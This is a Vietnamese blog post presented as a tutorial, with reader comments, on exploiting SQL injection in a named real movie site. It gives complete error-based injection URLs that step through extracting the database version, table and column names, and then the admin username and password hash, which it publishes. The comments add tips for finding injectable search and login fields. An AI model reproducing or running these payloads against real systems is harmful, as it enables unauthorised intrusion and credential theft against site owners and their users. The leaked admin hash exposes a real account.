Thứ Ba, 21 tháng 8, 2012

[Tut] SQL injection phimck.com



Khai thác lỗi này dùng Error Base nhé. Bắt đầu thôi

Get version

     Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Get table: table_user 
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Get column: user_name và user_password của table_user
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Get data user_name và user_password
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331
Chuyên Mục:
Người đăng: vào lúc

4 nhận xét:

  1. Unknownlúc 19:21 4 tháng 11, 2012

    sao biet trang nay loi sql ma khai thac the

    Trả lờiXóa
  2. Kẻ Chọc Giậnlúc 21:03 4 tháng 11, 2012

    Đối với một số mã nguồn thì mình có thể tìm lỗi bằng cách thêm ' vào sau id. nhưng 1 số mã nguồn có thể check lỗi vào ô search .
    thêm ' vào ô search ta được link http://phimck.com/Phim-Online/'.html
    -> và lỗi hiện ra

    Lỗi MySQL Query : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR film_name LIKE '%'%' OR film_name_real LIKE '%'%' OR film_actor LIKE '%'%'' at line 1

    tùy kinh nghiệm khai thác mà biết được mã nguồn như nào sẽ bị lỗi mà khai thác :D

    - ngoài ô search. còn có thể thêm ' vào ô Tài khoản chỗ đăng nhập để kiểm tra có lỗi hay không.

    Trả lờiXóa
    Trả lời
    1. Unknownlúc 13:58 12 tháng 11, 2012

      oh hay thế... bạn có thể viết vài tut về các lỗi khác không

      Xóa
    2. Kẻ Chọc Giậnlúc 14:18 12 tháng 11, 2012

      trên blog mình có nhiều cách khai thác. bạn có thể tìm hiểu :)

      Xóa

Đăng ký: Đăng Nhận xét (Atom)